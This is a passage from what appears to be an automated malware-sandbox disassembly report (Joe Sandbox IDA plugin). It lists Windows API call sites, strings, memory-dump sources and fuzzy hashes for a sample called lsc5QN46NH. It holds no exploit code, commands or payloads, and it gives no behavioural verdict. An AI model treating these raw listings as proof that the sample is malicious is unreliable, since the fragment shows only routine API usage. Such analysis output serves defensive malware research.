                                                                                                                • Instruction Fuzzy Hash: 2621C574A40108BFDF05ABA0CC85EFEBB76EF49310F10022AF961972E1EB755859DB24
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22
                                                                                                                  • Part of subcall function 0065AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0065AABC
                                                                                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 006590FD
                                                                                                                • GetDlgCtrlID.USER32 ref: 00659108
                                                                                                                • GetParent.USER32 ref: 00659124
                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00659127
                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00659130
                                                                                                                • GetParent.USER32(?), ref: 0065914C
                                                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 0065914F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 1536045017-1403004172
                                                                                                                • Opcode ID: d03643e07f702b868df3590931ed06dca3ec3ebef7e3113da0f8c9acf875934a
                                                                                                                • Instruction ID: 944a0f810e01614542cf03b61fb8fae9e2452d829207b98ce66f05ec59e24bfc
                                                                                                                • Opcode Fuzzy Hash: d03643e07f702b868df3590931ed06dca3ec3ebef7e3113da0f8c9acf875934a
                                                                                                                • Instruction Fuzzy Hash: 8921C574A40108BFDF15ABA4CC85EFEBB7AEF45301F10422AB911972E1EB755859DF20
                                                                                                                APIs
                                                                                                                • GetParent.USER32 ref: 0065916F
                                                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00659184
                                                                                                                • _wcscmp.LIBCMT ref: 00659196
                                                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00659211
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                • API String ID: 1704125052-3381328864
                                                                                                                • Opcode ID: b0b57de74b23358866bbef1d4793b0773264aacb457029a4c866c67d75b1284a
                                                                                                                • Instruction ID: 40a76f85250ec28204a4252e99a7f2a117c28926850f0053b62d220336cede32
                                                                                                                • Opcode Fuzzy Hash: b0b57de74b23358866bbef1d4793b0773264aacb457029a4c866c67d75b1284a
                                                                                                                • Instruction Fuzzy Hash: 08115976288717FAFB203624FC1ADE7379FDB11321F20012AFD00E01D1FE6269956AA4
                                                                                                                APIs
                                                                                                                • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00667A6C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafeVartype
                                                                                                                • String ID:
                                                                                                                • API String ID: 1725837607-0
                                                                                                                • Opcode ID: b8bf6d438c8b7ae3a81b1950e317a35222dae0f6decc40f341e1b423d1849347
                                                                                                                • Instruction ID: e1ad9195055bb061b1291d10f8d333ad55496179c6819d8d44fedf4799d03bf6
                                                                                                                • Opcode Fuzzy Hash: b8bf6d438c8b7ae3a81b1950e317a35222dae0f6decc40f341e1b423d1849347
                                                                                                                • Instruction Fuzzy Hash: C0B19D7190421A9FDB00DFA4C885BBEB7F6FF09329F244469E941EB391D734A941CBA4
                                                                                                                APIs
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 006611F0
                                                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00660268,?,00000001), ref: 00661204
                                                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 0066120B
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00660268,?,00000001), ref: 0066121A
                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0066122C
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00660268,?,00000001), ref: 00661245
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00660268,?,00000001), ref: 00661257
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00660268,?,00000001), ref: 0066129C
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00660268,?,00000001), ref: 006612B1
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00660268,?,00000001), ref: 006612BC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                • String ID:
                                                                                                                • API String ID: 2156557900-0
                                                                                                                • Opcode ID: d8c0af78a91aee8259d85256483574c986f64d3ad60013fe478ea05a30a62c5d
                                                                                                                • Instruction ID: 035d732cd4b3e86884c80d0a4ff6ac9a1f47436e7379955ac131c5ce21b70ed6
                                                                                                                • Opcode Fuzzy Hash: d8c0af78a91aee8259d85256483574c986f64d3ad60013fe478ea05a30a62c5d
                                                                                                                • Instruction Fuzzy Hash: 2231A075600208BFDB109F55EC98FBA77AFEF56315F145229F910CA2A0D7749EC08B64
                                                                                                                APIs
                                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0060FAA6
                                                                                                                • OleUninitialize.OLE32(?,00000000), ref: 0060FB45
                                                                                                                • UnregisterHotKey.USER32(?), ref: 0060FC9C
                                                                                                                • DestroyWindow.USER32(?), ref: 006445D6
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0064463B
                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00644668
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                • String ID: close all
                                                                                                                • API String ID: 469580280-3243417748
                                                                                                                • Opcode ID: 73021db091e0ee2b9da301ab668e0a919deedba1a000110d965cb6f25bb67d40
                                                                                                                • Instruction ID: 2664d9d79c44b8ee04cdce468244f867a9c389a944f7eea915d4032c33701566
                                                                                                                • Opcode Fuzzy Hash: 73021db091e0ee2b9da301ab668e0a919deedba1a000110d965cb6f25bb67d40
                                                                                                                • Instruction Fuzzy Hash: C0A18030701212CFDB68EF14C596BAAF366BF05700F5542ADE80AAB692DF30AC56CF54
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearInit$_memset
                                                                                                                • String ID: ,,i$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                • API String ID: 2862541840-316782094
                                                                                                                • Opcode ID: 3dc62619fce9649e55bc635a2130498d154cc5c3e9ed55d9e3fbe3a69d82f2d5
                                                                                                                • Instruction ID: ec814e485e3e16f8128bd4686445a752915f1cd374f0fad588e7b088bf2c84b5
                                                                                                                • Opcode Fuzzy Hash: 3dc62619fce9649e55bc635a2130498d154cc5c3e9ed55d9e3fbe3a69d82f2d5
                                                                                                                • Instruction Fuzzy Hash: 9C917B71A00219ABDF24DFA5C848FEEBBBAEF45720F108559F519AB281D7709941CBA0
                                                                                                                APIs
                                                                                                                • EnumChildWindows.USER32(?,0065A439), ref: 0065A377
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ChildEnumWindows
                                                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                • API String ID: 3555792229-1603158881
                                                                                                                • Opcode ID: a8a63c279dc4f8ed0233d0969ccdb2b48c3f55a500bc5831344eee6765c9eae0
                                                                                                                • Instruction ID: 16e33d7dd518cf0a658f80837e40b28f82646f473a5feb28a53099d61bcedd73
                                                                                                                • Opcode Fuzzy Hash: a8a63c279dc4f8ed0233d0969ccdb2b48c3f55a500bc5831344eee6765c9eae0
                                                                                                                • Instruction Fuzzy Hash: 2C91B830500516AADB48EFE0C492BEEFB77BF04305F54821DEC5AA7281DB316A9DCB95
                                                                                                                APIs
                                                                                                                • SetWindowLongW.USER32(?,000000EB), ref: 00602EAE
                                                                                                                  • Part of subcall function 00601DB3: GetClientRect.USER32(?,?), ref: 00601DDC
                                                                                                                  • Part of subcall function 00601DB3: GetWindowRect.USER32(?,?), ref: 00601E1D
                                                                                                                  • Part of subcall function 00601DB3: ScreenToClient.USER32(?,?), ref: 00601E45
                                                                                                                • GetDC.USER32 ref: 0063CD32
                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0063CD45
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0063CD53
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0063CD68
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0063CD70
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0063CDFB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                • String ID: U
                                                                                                                • API String ID: 4009187628-3372436214
                                                                                                                • Opcode ID: 734ff5850530eabe2ea82128daca0be2b05e9c4524b85a5b47176065c17aa5dd
                                                                                                                • Instruction ID: c7363e2997e4f7caaca5b0418c136cdbe515b154cea2f590566a38d541c54cd6
                                                                                                                • Opcode Fuzzy Hash: 734ff5850530eabe2ea82128daca0be2b05e9c4524b85a5b47176065c17aa5dd
                                                                                                                • Instruction Fuzzy Hash: C471BF31500205EFCF259F64CC94AEA7BB7FF48320F14426AFD55AA2A6D7319891DBA0
                                                                                                                APIs
                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00671A50
                                                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00671A7C
                                                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00671ABE
                                                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00671AD3
                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00671AE0
                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00671B10
                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00671B57
                                                                                                                  • Part of subcall function 00672483: GetLastError.KERNEL32(?,?,00671817,00000000,00000000,00000001), ref: 00672498
                                                                                                                  • Part of subcall function 00672483: SetEvent.KERNEL32(?,?,00671817,00000000,00000000,00000001), ref: 006724AD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2603140658-3916222277
                                                                                                                • Opcode ID: 383a9686fb84e6c8b805da7676e13b89c95b81ccaccd76eb48927196db209cc5
                                                                                                                • Instruction ID: 10409e599232d33cf1608caa6ba316e519eb81c595a6c59be3e722a5b5856f18
                                                                                                                • Opcode Fuzzy Hash: 383a9686fb84e6c8b805da7676e13b89c95b81ccaccd76eb48927196db209cc5
                                                                                                                • Instruction Fuzzy Hash: 714192B1501219BFEB118F64CC85FFB77AEEF09750F10812AFD099A241E7749E418BA4
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0068F910), ref: 00678D28
                                                                                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0068F910), ref: 00678D5C
                                                                                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00678ED6
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00678F00
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                • String ID:
                                                                                                                • API String ID: 560350794-0
                                                                                                                • Opcode ID: e6a3f77a57a834b402f46eeb7595f047b1f0a459c7650115dae7988e77558648
                                                                                                                • Instruction ID: c8217fccada996d486f82b372be768dcdc8c4ec394528cd93883b26089f3a782
                                                                                                                • Opcode Fuzzy Hash: e6a3f77a57a834b402f46eeb7595f047b1f0a459c7650115dae7988e77558648
                                                                                                                • Instruction Fuzzy Hash: BDF10971A00109EFDB14DF94C888EEEB7BAFF45315F108558F909AB251DB31AE46CB61
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0067F6B5
                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0067F848
                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0067F86C
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0067F8AC
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0067F8CE
                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0067FA4A
                                                                                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0067FA7C
                                                                                                                • CloseHandle.KERNEL32(?), ref: 0067FAAB
                                                                                                                • CloseHandle.KERNEL32(?), ref: 0067FB22
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4090791747-0
                                                                                                                • Opcode ID: 8339f0513b88726131dc313d1538b53cfe5ac3938127298a21e3861956e154f7
                                                                                                                • Instruction ID: 54db958b029d64afced5ae248fe895634bf4f1a326afcdb21c319ac20d624827
                                                                                                                • Opcode Fuzzy Hash: 8339f0513b88726131dc313d1538b53cfe5ac3938127298a21e3861956e154f7
                                                                                                                • Instruction Fuzzy Hash: D5E1BD71204201AFC754EF24D891FAABBE2AF85314F14896DF8899B3A2CB31DC41CB56
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0066466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00663697,?), ref: 0066468B
                                                                                                                  • Part of subcall function 0066466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00663697,?), ref: 006646A4
                                                                                                                  • Part of subcall function 00664A31: GetFileAttributesW.KERNEL32(?,0066370B), ref: 00664A32
                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00664D40
                                                                                                                • _wcscmp.LIBCMT ref: 00664D5A
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00664D75
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 793581249-0
                                                                                                                • Opcode ID: f0f532b1ef0f4a7e63acd571b8fd3e518921c81b4faff84ecbb1b84f2558ab3b
                                                                                                                • Instruction ID: eca15be45c4abae408b900ae0031932b3341ea2bc61df2bbe6347b69e7386a75
                                                                                                                • Opcode Fuzzy Hash: f0f532b1ef0f4a7e63acd571b8fd3e518921c81b4faff84ecbb1b84f2558ab3b
                                                                                                                • Instruction Fuzzy Hash: D75168B2408385ABC765DB90D8819DFB3EDAF85350F00092EF685D3151EF35A589CB5A
                                                                                                                APIs
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 006886FF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InvalidateRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 634782764-0
                                                                                                                • Opcode ID: 7baa8ca60665fe3943db87b7a52bd611d04463217bde0db58a9ed40c4750774c
                                                                                                                • Instruction ID: abdd5f1ed944ad2cb4f6c658dc696fc0c30ae0c503e831dedf1fa1002cf8349d
                                                                                                                • Opcode Fuzzy Hash: 7baa8ca60665fe3943db87b7a52bd611d04463217bde0db58a9ed40c4750774c
                                                                                                                • Instruction Fuzzy Hash: BB518170540254BEEB24AB24CC89FAD7BA7EF05720FA04315FA51E72E1DF71A980CB55
                                                                                                                APIs
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0063C2F7
                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0063C319
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0063C331
                                                                                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0063C34F
                                                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0063C370
                                                                                                                • DestroyIcon.USER32(00000000), ref: 0063C37F
                                                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0063C39C
                                                                                                                • DestroyIcon.USER32(?), ref: 0063C3AB
                                                                                                                  • Part of subcall function 0068A4AF: DeleteObject.GDI32(00000000), ref: 0068A4E8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                • String ID:
                                                                                                                • API String ID: 2819616528-0
                                                                                                                • Opcode ID: af6189205b69cf1e7f1d58dce17a3645728b62bec7b39b68732924ad379ebea9
                                                                                                                • Instruction ID: 1d4b1112bd27ce1b353a07e7b0b4a28189efea86e91a936e1a376cc4e703f649
                                                                                                                • Opcode Fuzzy Hash: af6189205b69cf1e7f1d58dce17a3645728b62bec7b39b68732924ad379ebea9
                                                                                                                • Instruction Fuzzy Hash: 3E514B70A40206AFEB24DF64CC55FAB7BA6EF54320F104629F912A72D0D770ED91DB90
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0065A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0065A84C
                                                                                                                  • Part of subcall function 0065A82C: GetCurrentThreadId.KERNEL32 ref: 0065A853
                                                                                                                  • Part of subcall function 0065A82C: AttachThreadInput.USER32(00000000,?,00659683,?,00000001), ref: 0065A85A
